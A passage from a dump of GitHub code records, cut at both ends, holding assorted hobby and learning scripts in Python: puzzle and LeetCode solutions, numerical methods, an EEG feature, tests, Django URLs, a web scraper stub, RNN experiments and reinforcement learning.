fourth_quantity]\n\n\t\t\t\tscore, _ = calc_score(ingredients, quantities)\n\n\t\t\t\tif score > max_score:\n\t\t\t\t\tmax_score = score\n\treturn max_score\n\ndef part2(lines):\n\tingredients = parse_ingredients(lines)\n\n\tmax_score = 0\n\n\tfor first_quantity in range(101):\n\t\tfor second_quanitity in range(100 - first_quantity):\n\t\t\tfor third_quantity in range(100 - (first_quantity + second_quanitity)):\n\t\t\t\tfourth_quantity = 100 - (first_quantity + second_quanitity + third_quantity)\n\n\t\t\t\tquantities = [first_quantity, second_quanitity, third_quantity, fourth_quantity]\n\n\t\t\t\tscore, calories = calc_score(ingredients, quantities)\n\n\t\t\t\tif calories == 500 and score > max_score:\n\t\t\t\t\tmax_score = score\n\treturn max_score\n\n\ndef main():\n\tprint(part1(fileinput.input()))\n\tprint(part2(fileinput.input()))\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"paul-schwendenman/advent-of-code","sub_path":"2015/day15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26932577423","text":"'''\r\nQ1547. Description: Given a wooden stick of length n units. The stick is labelled from 0 to n.\r\nGiven an integer array cuts where cuts[i] denotes a position you should perform a cut at.\r\n\r\nYou should perform the cuts in order, you can change the order of the cuts as you wish.\r\nThe cost of one cut is the length of the stick to be cut, the total cost is the sum of costs of all cuts. When you cut a stick, it will be split into two smaller sticks (i.e. the sum of their lengths is the length of the stick before the cut). Please refer to the first example for a better explanation.\r\n\r\nReturn the minimum total cost of the cuts.\r\n'''\r\n\r\nclass Solution:\r\n def minCost(self, n: int, cuts: List[int]) -> int:\r\n m = len(cuts)\r\n # Store cutting positions\r\n cuts = [0] + sorted(cuts) + [n]\r\n # Cost of cutting stick in 2 parts - left and right\r\n dp = [[0] * (m + 2) for _ in range(m + 2)]\r\n\r\n for diff in range(2, m+2):\r\n for left in range(m + 2 - diff):\r\n right = left + diff\r\n # If cut not possible, set to infinity\r\n ans = float('inf')\r\n for mid in range(left + 1, right):\r\n ans = min(ans, dp[left][mid] + dp[mid][right] + cuts[right] - cuts[left])\r\n dp[left][right] = ans\r\n return dp[0][m+1]","repo_name":"aditi-govindu/LeetCode-DSA","sub_path":"MayChallenge_2023/MinimumCostCutStick.py","file_name":"MinimumCostCutStick.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2477010085","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass MyLinkedList:\n\n def __init__(self):\n # 头部伪节点\n self._head = Node(0)\n self._count = 0\n\n def get(self, index: int) -> int:\n if 0 <= index < self._count:\n cur = self._head.next\n for _ in range(index):\n cur = cur.next\n return cur.val\n else:\n return -1\n\n def addAtHead(self, val: int) -> None:\n self.addAtIndex(0, val)\n\n def addAtTail(self, val: int) -> None:\n self.addAtIndex(self._count, val)\n\n def addAtIndex(self, index: int, val: int) -> None:\n if index < 0:\n index = 0\n # _count为链表末尾\n elif index > self._count:\n return\n cur = self._head\n for _ in range(index):\n cur = cur.next\n nxt = cur.next\n cur.next = Node(val)\n cur.next.next = nxt\n self._count += 1\n\n def deleteAtIndex(self, index: int) -> None:\n if index < 0:\n index = 0\n elif index >= self._count:\n return\n cur = self._head\n for _ in range(index):\n cur = cur.next\n cur.next = cur.next.next\n self._count -= 1\n\n\n# Your MyLinkedList object will be instantiated and called as such:\n# obj = MyLinkedList()\n# param_1 = obj.get(index)\n# obj.addAtHead(val)\n# obj.addAtTail(val)\n# obj.addAtIndex(index,val)\n# obj.deleteAtIndex(index)","repo_name":"OhYoooo/Leetcode","sub_path":"python/2.Linked-list/707.Design-Linked-List.py","file_name":"707.Design-Linked-List.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24237498831","text":"from features.frequency.welch import estimate_welch\nfrom utils.dict_validation import _assert_valid_dict\n\nfrom numpy import (ndarray, asarray, array, transpose)\n\n\ndef COG(eeg_dict: dict,\n fs: int = 250,\n window: str = 'hann',\n noverlap: int = 256,\n nfft: int = 512,\n nperseg: int = 512,\n fmin: int = 1,\n fmax: int = 18\n ) -> (ndarray, ndarray):\n \"\"\"\n Computes left-right and anterior-posterior power distributions along the scalp using\n van Putten's center-of-gravity feature.\n\n :param eeg_dict: Dictionary of channels (keys) and arrays of signal values (values), passed per segment.\n :param fs: Sampling frequency of the series, default 250 Hz.\n :param window: Window function, default 'hann'.\n :param noverlap: Number of points to overlap between segments, default 256.\n If None, noverlap = nperseg // 2\n :param nfft: Length of the FFT used, default 512.\n :param nperseg: Length of each segment, default 512.\n :param fmin: Minimum frequency bound for power spectrum, default 1.\n :param fmax: Maximum frequency bound for power spectrum, default 12.\n\n :return: Power in left-right direction, weighted by channel positions.\n :return: Power in anterior-posterior direction, weighted by channel positions.\n\n References\n ----------\n [1] Van Putten (2007), The colorful brain: compact visualisation of routine EEG recordings.\n .. 10.1007/978-3-540-73044-6_127\n\n \"\"\"\n\n _assert_valid_dict(eeg_dict=eeg_dict, fs=fs, noverlap=noverlap, nfft=nfft, nperseg=nperseg)\n\n channels = array(list(eeg_dict.keys()))\n\n Sxx = transpose(\n\n [estimate_welch(eeg_dict[ch], fs, window, noverlap, nfft, nperseg, fmin, fmax)[1] for ch in channels]\n\n )\n # Order channels = [Fp2 F8 T4 T6 O2 F4 C4 P4 Fz Cz Pz F3 C3 P3 Fp1 F7 T3 T5 O1]\n x = array([0, 2, 2, 2, 1, 1, 1, 1, 0, 0, 0, -1, -1, -1, 0, -2, -2, -2, -1])\n y = array([0, 1, 0, -1, -2, 1, 0, -1, 1, 0, -1, 1, 0, -1, 0, 1, 0, -1, -2])\n\n # Compute euclidean distances from center location Cz\n x_cog = (Sxx @ x) / Sxx.sum(axis=1)\n y_cog = (Sxx @ y) / Sxx.sum(axis=1)\n\n return x_cog, y_cog\n","repo_name":"RobvanderNagel94/pathologylib","sub_path":"features/background/center_of_gravity.py","file_name":"center_of_gravity.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16243698337","text":"def swap(x,y):\n temp = x\n x = y\n y = temp\n return\n\ns2 = []\ne = [] \nd = []\nabcissa = []\nordenada = []\nInfo = 0\n\npontosMax = int(input(\"Insira o numero total de pontos: \"))\nfor i in range(pontosMax):\n abcissa.append(float(input(\"Insira a abcissa do ponto: \" + str(i+1) + \".\\n\")))\n ordenada.append(float(input(\"Insira a ordenada do ponto: \" + str(i+1) + \".\\n\")))\nfor i in range(1,pontosMax): #InsertionSort para ordenar \n for j in range(i):\n if(abcissa[i] < abcissa[j]):\n swap(abcissa[i] , abcissa[j])\n swap(ordenada[i] , ordenada[j])\nOrdenado = True\nif(pontosMax < 3):\n Info = -1\n print(\"\\nNumero de pontos menor que 3.\\n\")\n print(\"Info: \" + str(Info))\n exit\nfor i in range(1,pontosMax):\n Ordenado = Ordenado and abcissa[i-1] < abcissa[i]\nif(not Ordenado):\n Info = -2\n print(\"\\nAbcissas não ordenadas.\\n\")\n print(\"Info: \" + str(Info))\n exit\nfor i in range(pontosMax):\n s2.append(0)\nm = pontosMax - 2\n#Construção do sistema linear tridiagonal simétrico\nHa = abcissa[1] - abcissa[0]\nDeltaa = (ordenada[1] - ordenada[0]) / Ha\nfor i in range(m):\n ip1 = i + 1\n ip2 = i + 2\n Hb = abcissa[ip2] - abcissa[ip1]\n Deltab = (ordenada[ip2] - ordenada[ip1]) / Hb\n e.insert(i,Hb)\n d.insert(i,(2 * (Ha + Hb)))\n s2[ip1] = 6 * (Deltab - Deltaa)\n Ha = Hb\n Deltaa = Deltab\n#Eliminação de gauss\nfor i in range(1,m+1):\n ip1 = i + 1\n im1 = i - 1\n t = e[im1] / d[im1]\n d.insert(i, d[i-1] - (t * e[im1]) )\n s2[ip1] = (s2[ip1] - (t * s2[i-1]))\n#solução por substituições retroativas\ns2[m] = (s2[m] / d[m-1]) # Problema\nfor i in range( m-1, 1, -1):\n ip1 = i + 1\n im1 = i - 1\n s2[i] = (s2[i] - (e[im1] * s2[ip1])) / d[im1]\ns2[0] = 0\ns2[pontosMax-1] = 0 \nprint(\"\\nVetor de derivadas segundas:\\n\")\nprint(s2)\nprint(\"\\nInfo: \" + str(Info))","repo_name":"ar1vit0r/Polynomial-Interpolation","sub_path":"Algoritmo SplineCubicaNatural.py","file_name":"Algoritmo SplineCubicaNatural.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13753791426","text":"from typing import Any\n\nimport pytest\nfrom hypothesis import given\n\nfrom rene import Location\nfrom rene.exact import (Polygon,\n Trapezoidation)\nfrom rene.hints import Seeder\nfrom . import strategies\n\n\n@given(strategies.polygons)\ndef test_basic_default_seeder(polygon: Polygon) -> None:\n result = Trapezoidation.from_polygon(polygon)\n\n assert isinstance(result, Trapezoidation)\n\n\n@given(strategies.polygons, strategies.seeders)\ndef test_basic_custom_seeder(polygon: Polygon, seeder: Seeder) -> None:\n result = Trapezoidation.from_polygon(polygon,\n seeder=seeder)\n\n assert isinstance(result, Trapezoidation)\n\n\n@given(strategies.polygons, strategies.seeders)\ndef test_contains(polygon: Polygon, seeder: Seeder) -> None:\n result = Trapezoidation.from_polygon(polygon,\n seeder=seeder)\n\n assert all(vertex in result for vertex in polygon.border.vertices)\n assert all(vertex in result\n for hole in polygon.holes\n for vertex in hole.vertices)\n\n\n@given(strategies.polygons, strategies.seeders)\ndef test_locate(polygon: Polygon, seeder: Seeder) -> None:\n result = Trapezoidation.from_polygon(polygon,\n seeder=seeder)\n\n assert all(result.locate(vertex) is Location.BOUNDARY\n for vertex in polygon.border.vertices)\n assert all(result.locate(vertex) is Location.BOUNDARY\n for hole in polygon.holes\n for vertex in hole.vertices)\n\n\n@given(strategies.polygons, strategies.invalid_seeds)\ndef test_invalid_seeders(polygon: Polygon,\n invalid_seed: Any) -> None:\n with pytest.raises((OverflowError, TypeError, ValueError)):\n Trapezoidation.from_polygon(polygon,\n seeder=lambda: invalid_seed)\n","repo_name":"lycantropos/rene","sub_path":"tests/exact_tests/trapezoidation_tests/test_from_polygon.py","file_name":"test_from_polygon.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23432919831","text":"from heapq import nlargest\r\n\r\n\r\ndef GetNumber(temp, templist):\r\n list = [t for t in templist if float(temp) < float(t)]\r\n #print(list)\r\n if list: return min(list)\r\n else: return None \r\n\r\nwith open(\"D-large.in\", \"r\") as f:\r\n num_case = int(f.readline())\r\n #lst.append(f.readline().split())\r\n\r\n for n in range(1, num_case + 1):\r\n\r\n numOfblock = int(f.readline())\r\n naomi =(f.readline().split())\r\n ken =(f.readline().split())\r\n\r\n Warnaomi = naomi[:]\r\n Warken = ken[:]\r\n \r\n naomiScore = 0\r\n warScore = 0\r\n\r\n while (naomi and ken):\r\n if(min(naomi) < min(ken)):\r\n #print(\"burn naomi \",min(naomi))\r\n #print(\"burn ken\",max(ken))\r\n naomi.remove(min(naomi))\r\n ken.remove(max(ken))\r\n\r\n elif(min(naomi) > max(ken)):\r\n naomiScore = naomiScore+1\r\n #print(\"burn naomi \",min(naomi))\r\n #print(\"burn ken\",min(ken))\r\n naomi.remove(min(naomi))\r\n ken.remove(min(ken))\r\n \r\n elif(min(naomi)> min(ken)):\r\n naomiScore = naomiScore+1\r\n #print(\"burn naomi \",min(naomi))\r\n #print(\"burn ken\",min(ken))\r\n naomi.remove(min(naomi))\r\n ken.remove(min(ken)) \r\n\r\n else:\r\n print(\"None\") \r\n\r\n while (Warnaomi and Warken):\r\n \r\n if(min(Warnaomi) < min(Warken)):\r\n #print(\"burn naomi \",min(Warnaomi))\r\n #print(\"burn ken\",min(Warken))\r\n Warnaomi.remove(min(Warnaomi))\r\n Warken.remove(min(Warken))\r\n\r\n elif(min(Warnaomi) > min(Warken)):\r\n chosenKen = GetNumber(min(Warnaomi), Warken)\r\n #print(\"ken \" ,min(Warnaomi), chosenKen)\r\n if(chosenKen == None):\r\n warScore = warScore + 1\r\n #print(\"burn naomi \",min(Warnaomi))\r\n #print(\"burn ken\",max(Warken))\r\n Warnaomi.remove(min(Warnaomi))\r\n Warken.remove(min(Warken))\r\n else:\r\n #print(\"burn naomi \",min(Warnaomi))\r\n #print(\"burn ken\",max(Warken))\r\n Warnaomi.remove(min(Warnaomi))\r\n Warken.remove(chosenKen)\r\n\r\n\r\n print(\"Case #{0}: {1} {2}\".format(n, naomiScore, warScore))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1406.py","file_name":"1406.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12958858641","text":"#! python3\r\n# Open spreadsheets and writes the cells into one text file for each columns\r\nimport openpyxl \r\nwb = openpyxl.load_workbook('TextToExcel.xlsx')\r\nsheet = wb.active\r\ncolumn_len = sheet.max_column\r\nrow_len = sheet.max_row\r\n# Harvesting data\r\ndata_bank = {}\r\nfor column in range(1, column_len + 1):\r\n data_bank.update({column:[]})\r\n for row in range(1, row_len + 1):\r\n data_bank[column].append(sheet.cell(row = row, column = column).value)\r\n# Placing the data into .txt files\r\nfor key in data_bank.keys():\r\n open_txt = open('num' + str(key) + '.txt', 'a')\r\n txt = ''\r\n txt = ' '.join(data_bank.get(key))\r\n open_txt.write(txt)\r\n open_txt.close()\r\n","repo_name":"QaisZainon/Learning-Coding","sub_path":"Automate the Boring Stuff/Ch.13 - Working with Excel Spreadsheets/SpreadsheetToTextFiles.py","file_name":"SpreadsheetToTextFiles.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28455418767","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout\nfrom django.views.generic.base import RedirectView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', RedirectView.as_view(url='meraki_inv/', permanent=False)),\n url(r'^accounts/login/', login, \\\n {'template_name': 'meraki_inv/login.html'}, name='login'),\n url(r'^accounts/logout/', logout, \\\n {'next_page': '/meraki_inv/'}, name='logout'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^meraki_inv/', include('meraki_inv.urls', namespace=\"meraki_inv\")),\n)\n","repo_name":"jhanes-meraki/inv","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4381419853","text":"#coding: utf-8\n'''\n爬取煎蛋网上的美女图片\n'''\n\nimport urllib.request\nimport os\nimport os.path\nimport re\nfrom bs4 import BeautifulSoup\nimport json\nimport time\nfrom selenium import webdriver\n\ndef get_page_source(url):\n\t'根据输入的url,以字符串的形式输出网页源代码'\n\tdriver =webdriver.PhantomJS(executable_path=\"D:\\ruanjian\\phantomjs\\phantomjs-2.1.1-windows\\bin\\phantomjs.exe\")#使用下载好的phantomjs,网上也有人用firefox,chrome,但是我没有成功,用这个也挺方便\n\tdriver.set_page_load_timeout(30)\n\ttime.sleep(3)\n\thtml=driver.get(url)#使用get方法请求url,因为是模拟浏览器,所以不需要headers信息 \n\thtml=driver.page_source#获取网页的html数据\n\tsoup=BeautifulSoup(html,'lxml')#对html进行解析,如果提示lxml未安装,直接pip install lxml即可\n\tprint(soup)\n\ndef get_page_num(url):\n\thtml =get_page_source(url).decode('utf-8')\n\ta = html.find(\"current-comment-page\")+23\n\tb = html.find(']',a)\n\tnum =html[a:b]\n\treturn num\n\t\n\t\ndef find_imgs(url):\n\thtml =get_page_source(url).decode('utf-8')\n\tprint(html)\n\t#img_addrs = []\n\t#pa =re.compile(r'
', ServiceUpdateView.as_view(), name='update'),\n path('delete/', ServiceDeleteView.as_view(), name='delete'),\n path('pedido/', views.realizar_pedido, name='detalle_pedido'),\n path('create_pedido/', ServiceCreatePedido.as_view(), name='create_pedido'),\n path('success_pedido/', PedidoSuccess.as_view(), name='success_pedido'),\n], 'services')","repo_name":"ottomontoya/webGameThrones","sub_path":"services/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25740614221","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom preproccess import Dataset\nfrom random import sample, randint\nfrom matplotlib import pyplot as plt\nclass RNN_cell:\n def __init__(self):\n print(\"hello\")\n\n\nclass model_2:\n def __init__(self, dataset: Dataset, feature_sets, p=True):\n self.p = p\n self.dataset = dataset\n self.feature_sets = feature_sets\n self.raw_data = dataset.vec_df_filtered if dataset.vec_df_filtered is not None else dataset.vec_df\n\n\n def organize_input(self):\n inputs = []\n for set in self.feature_sets:\n cols = []\n for col in set:\n cols += [x for x in list(self.raw_data.columns.values) if col in x]\n inputs.append(self.raw_data[cols])\n return inputs\n\n def train_test_split(self, inputs, train_size=0.8):\n train_size = int(self.raw_data.shape[0] * train_size)\n all_idx = list(range(self.raw_data.shape[0]))\n train_idx = sample(all_idx, train_size)\n test_idx = [x for x in all_idx if x not in train_idx]\n X_train = [x.iloc[train_idx].to_numpy() for x in inputs]\n X_test = [x.iloc[test_idx].to_numpy() for x in inputs]\n y_train = self.raw_data.iloc[train_idx]['success'].values\n y_test = self.raw_data.iloc[test_idx]['success'].values\n return np.array(X_train), np.array(X_test), np.array(y_train), np.array(y_test)\n\n def run(self):\n print(max(self.dataset.vocab.values()))\n if self.p: print(\"model 2 running\")\n inputs = self.organize_input()\n X = self.raw_data.drop('success', axis=1).to_numpy()\n X = np.array([[[x] for x in row] for row in X], dtype=float)\n y = self.raw_data['success'].to_numpy(dtype=float)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n # X_train, X_test, y_train, y_test = self.train_test_split(inputs)\n print(X_train.shape)\n rnn_model = tf.keras.models.Sequential()\n # rnn_model.add(tf.keras.layers.Embedding(1000, 10))\n rnn_model.add(tf.keras.layers.SimpleRNN(7))\n rnn_model.add(tf.keras.layers.Dense(1))\n rnn_model.compile(loss='mean_absolute_error', optimizer='adam', metrics=['accuracy'])\n # rnn_model.summary()\n history = rnn_model.fit(X_train, y_train, epochs=100)\n\n res = rnn_model.predict(X_test)\n print(res)\n self.plot_results(history, res, y_test)\n\n def plot_results(self, history, res, y_test):\n print(len(res), len(y_test))\n plt.scatter(range(len(res)), res, c='r')\n plt.scatter(range(len(y_test)), y_test, c='g')\n plt.show()\n plt.plot(history.history['loss'])\n plt.show()\n\n\nclass RNN_model_test:\n def __init__(self):\n path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')\n text = open(path_to_file, 'rb').read().decode(encoding='utf-8')\n print(text[:13])\n vocab = list(dict.fromkeys(sorted(text)))\n char2idx = {u: i for i, u in enumerate(vocab)}\n idx2char = np.array(vocab)\n text_as_int = np.array([char2idx[c] for c in text])\n print('{')\n for char, _ in zip(char2idx, range(20)):\n print(' {:4s}: {:3d},'.format(repr(char), char2idx[char]))\n print(' ...\\n}')\n\n print('{} ---- characters mapped to int ---- > {}'.format(repr(text[:13]), text_as_int[:13]))\n seq_length = 100\n examples_per_epoch = len(text) // (seq_length + 1)\n\n # Create training examples / targets\n char_dataset = tf.data.Dataset.from_tensor_slices(text_as_int)\n for i in char_dataset.take(5):\n print(idx2char[i.numpy()])\n\n sequences = char_dataset.batch(seq_length + 1, drop_remainder=True)\n\n for item in sequences.take(5):\n s = 
repr(''.join(idx2char[item.numpy()]))\n print(s, len(s))\n print()\n\n dataset = sequences.map(self.split_input_target)\n\n for input_example, target_example in dataset.take(1):\n print('Input data: ', repr(''.join(idx2char[input_example.numpy()])))\n print('Target data:', repr(''.join(idx2char[target_example.numpy()])))\n print()\n\n for i, (input_idx, target_idx) in enumerate(zip(input_example[:5], target_example[:5])):\n print(\"Step {:4d}\".format(i))\n print(\" input: {} ({:s})\".format(input_idx, repr(idx2char[input_idx])))\n print(\" expected output: {} ({:s})\".format(target_idx, repr(idx2char[target_idx])))\n print()\n # Batch size\n BATCH_SIZE = 64\n\n # Buffer size to shuffle the dataset\n # (TF data is designed to work with possibly infinite sequences,\n # so it doesn't attempt to shuffle the entire sequence in memory. Instead,\n # it maintains a buffer in which it shuffles elements).\n BUFFER_SIZE = 10000\n\n dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True)\n\n print(dataset, '\\n')\n\n # Length of the vocabulary in chars\n vocab_size = len(vocab)\n\n # The embedding dimension\n embedding_dim = 256\n\n # Number of RNN units\n rnn_units = 1024\n\n model = self.build_model(\n vocab_size=len(vocab),\n embedding_dim=embedding_dim,\n rnn_units=rnn_units,\n batch_size=BATCH_SIZE)\n\n for input_example_batch, target_example_batch in dataset.take(1):\n example_batch_predictions = model(input_example_batch)\n print(example_batch_predictions.shape, \"# (batch_size, sequence_length, vocab_size)\")\n\n model.summary()\n\n sampled_indices = tf.random.categorical(example_batch_predictions[0], num_samples=1)\n sampled_indices = tf.squeeze(sampled_indices, axis=-1).numpy()\n\n print(sampled_indices)\n\n print(\"Input: \\n\", repr(\"\".join(idx2char[input_example_batch[0]])))\n print()\n print(\"Next Char Predictions: \\n\", repr(\"\".join(idx2char[sampled_indices])))\n\n @ staticmethod\n def build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim,\n batch_input_shape=[batch_size, None]),\n tf.keras.layers.GRU(rnn_units,\n return_sequences=True,\n stateful=True,\n recurrent_initializer='glorot_uniform'),\n tf.keras.layers.Dense(vocab_size)\n ])\n return model\n\n @ staticmethod\n def split_input_target(chunk):\n input_text = chunk[:-1]\n target_text = chunk[1:]\n return input_text, target_text\n\n\nclass RNN_model_test_2:\n def __init__(self):\n data = [[[(i + j)] for i in range(2, 7)] for j in range(100)]\n target = [1 if any([sum([y[0] for y in x]) % j == 0 for j in [3, 4]]) else 0 for x in data]\n data = np.array(data, dtype=float)\n target = np.array(target, dtype=float)\n print(data)\n print(target)\n print(data.shape)\n print(target.shape)\n x_train, x_test, y_train, y_test = train_test_split(data, target, test_size=0.2, random_state=4)\n m = tf.keras.models.Sequential()\n m.add(tf.keras.layers.Embedding(1000, 5))\n m.add(tf.keras.layers.SimpleRNN(1, batch_input_shape=(None, 5, 1), return_sequences=True))\n m.add(tf.keras.layers.SimpleRNN(1, return_sequences=False))\n m.compile(loss='mean_absolute_error', optimizer='adam', metrics=['accuracy'])\n m.summary()\n history = m.fit(x_train, y_train, epochs=500)\n res = m.predict(x_test)\n res = [1 if x >= 0.5 else 0 for x in res]\n print(res)\n plt.scatter(range(20), res, c='r')\n plt.scatter(range(20), y_test, c='g')\n plt.show()\n plt.plot(history.history['loss'])\n 
plt.show()\n","repo_name":"Silber93/ML_poject","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
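+The split_input_target mapping above is the heart of the character-model data pipeline: each window of length seq_length + 1 becomes an (input, target) pair where the target is the input shifted one character to the left. The same idea on a plain string:
+
+def split_input_target(chunk):
+    return chunk[:-1], chunk[1:]
+
+# 'Hello' -> input 'Hell', target 'ello': at every position the model is
+# asked to predict the character that follows the one it has just seen.
+assert split_input_target('Hello') == ('Hell', 'ello')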
+{"seq_id":"43840524010","text":"a, t = map(int, input().split())\n\nfrom random import randrange\n\nfor _ in range(t):\n\te = input().split()\n\ts = ''.join(e[1:])\n\ttot = 0\n\tz = [0 for _ in range(len(s))]\n\tl = -1\n\tr = -1\n\tfor i in range(1, len(s)):\n\t\tz[i] = 0 if i>=r else min(r-i, z[i-l])\n\t\twhile (i + z[i] < len(s) and s[i+z[i]] == s[z[i]]):\n\t\t\tz[i]+=1\n\t\tif (i+z[i] > r):\n\t\t\tl = i\n\t\t\tr = i + z[i]\n\tprint(z)\n\tfor _ in range(10000):\n\t\tt = ''\n\t\ti = 0\n\t\twhile(len(t) < len(s) or t[-len(s):] != s):\n\t\t\ti += 1\n\t\t\tt += ( chr(ord('0') + randrange(1, a+1)) )\n\t\ttot += i\n\tprint(tot/10000)","repo_name":"ablondal/comp-prog","sub_path":"Practice/NAPC_Practice_Week_1/singland.py","file_name":"singland.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41606099713","text":"import gym\r\nimport random\r\nimport numpy as np\r\n\r\nenv = gym.make(\"FrozenLake-v1\", render_mode=\"rgb_array\")\r\nenv.reset()\r\n# assigns rows(states) and columns(actions)\r\nrows = env.observation_space.n\r\ncols = env.action_space.n\r\nqTable = np.zeros((rows, cols))\r\n# how easily agent accepts new info\r\nlearningRate = 0.8\r\n# how much long term rewards should be valued in comparison to short term\r\ndiscountFactor = 0.8\r\nepsilon = 0.85\r\ndecreasingRate = 0.005\r\nepisodes = 1000\r\nsteps = 100\r\n\r\nfor episode in range(episodes):\r\n truncated = False\r\n terminated = False\r\n state = env.reset()[0]\r\n for step in range(steps):\r\n # determines whether agent explores or exploits\r\n if random.uniform(0, 1) < epsilon:\r\n action = env.action_space.sample()\r\n else:\r\n action = np.argmax(qTable[state, :])\r\n newState, reward, truncated, terminated, _ = env.step(action)\r\n qTable[state, action] = qTable[state, action] + learningRate * \\\r\n (reward + discountFactor * np.max(qTable[newState, :]) - qTable[state, action])\r\n print(f\"Step: {step} of episode {episode}\")\r\n state = newState\r\n if truncated or terminated:\r\n break\r\n epsilon = np.exp(-decreasingRate * episode)\r\n print(f\"Epsilon: {epsilon}\")\r\n\r\nenv = gym.make(\"FrozenLake-v1\", render_mode=\"human\")\r\nepisodes1 = 10\r\nfor episode1 in range(episodes1):\r\n score = 0\r\n step = 0\r\n state = env.reset()[0]\r\n truncated = False\r\n terminated = False\r\n while not(truncated or terminated):\r\n print(f\"Step: {step}\")\r\n action = np.argmax(qTable[state, :])\r\n newState, reward, truncated, terminated, _ = env.step(action)\r\n score += reward\r\n env.render()\r\n print(f\"Score = {score}\")\r\n state = newState\r\n step += 1\r\nenv.close()\r\n","repo_name":"jakethehoffer/onboarding","sub_path":"lake.py","file_name":"lake.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18278917494","text":"from sklearn.datasets.samples_generator import make_blobs;\r\nimport matplotlib.pyplot as plt;\r\nfrom sklearn.svm import SVC; # \"Support Vector Classifier\"\r\nimport numpy as np;\r\nimport random;\r\nimport pickle;\r\n\r\n\r\n\r\n\r\nclass naive_bayes:\r\n #features_type is an array storing a string of each feature's type\r\n def __init__(self,num_features, num_classes):\r\n self.n_features = num_features;\r\n self.num_classes = num_classes;\r\n self.P = [[{} for i in range(0,self.n_features)] for j in range(0,self.num_classes)];\r\n self.class_count = [0 for i in range(0,num_classes)];\r\n\r\n # Y-values are in [k] - 1 (namely integer values)\r\n def train(self,X,Y):\r\n nc = self.num_classes;\r\n nf = self.n_features;\r\n\r\n m = len(X);\r\n for i in range(0,m):\r\n row = X[i];\r\n val = Y[i];\r\n\r\n self.class_count[val] += 1;\r\n for j in range(0,nf):\r\n\r\n t1 = row[j];\r\n map = self.P[val][j];\r\n if t1 not in map:\r\n map[t1] = 0;\r\n map[t1] += 1;\r\n\r\n\r\n def predict(self,X):\r\n result = [];\r\n m = len(X);\r\n nc = self.num_classes;\r\n nf = self.n_features;\r\n\r\n for i in range(0,m):\r\n row = X[i];\r\n max_prob = -1;\r\n best_choice = -1;\r\n\r\n for j in range(0,nc):\r\n temp = (float)(self.class_count[j]) / (float)(m);\r\n for k in range(0,nf):\r\n val = row[k];\r\n map = self.P[j][k];\r\n if val not in map:\r\n temp = 0;\r\n else:\r\n temp *= (float) (map[val]) / (float) (self.class_count[j]);\r\n\r\n if temp >= max_prob:\r\n max_prob = temp;\r\n best_choice = j;\r\n\r\n assert(best_choice != -1);\r\n result.append(best_choice);\r\n\r\n return np.array(result);\r\n\r\ndef evaluate_accuracy(Y_pred,Y_true):\r\n n = len(Y_pred);\r\n count = 0;\r\n for i in range(0,n):\r\n if Y_pred[i] != Y_true[i]:\r\n count += 1;\r\n return 1 - (float) (count) / (float) (n);\r\n\r\ndef train_test_split(X,Y,frac):\r\n if frac > 1 or frac <= 0:\r\n raise Exception('Improper Value for frac');\r\n m = len(X);\r\n k = (int) (frac * m);\r\n S = random_subset(m,k);\r\n Sc = [];\r\n for i in range(0,m):\r\n if i not in S:\r\n Sc.append(i);\r\n\r\n return np.array([X[i] for i in S]) , np.array([Y[i] for i in S]) , np.array([X[i] for i in Sc]) , np.array([Y[i] for i in Sc]);\r\n\r\ndef random_subset(n,k):\r\n if k <= 0 or n <= 0:\r\n print(\"k must be >= 0\");\r\n return [];\r\n\r\n if k >= n:\r\n return [i for i in range(0,n)];\r\n\r\n result = [0 for i in range(0,k)];\r\n\r\n temp = [i for i in range(0,n)];\r\n\r\n for i in range(0,k):\r\n p = random.uniform(0,1);\r\n j = (int)((n-i) * p);\r\n t1 = 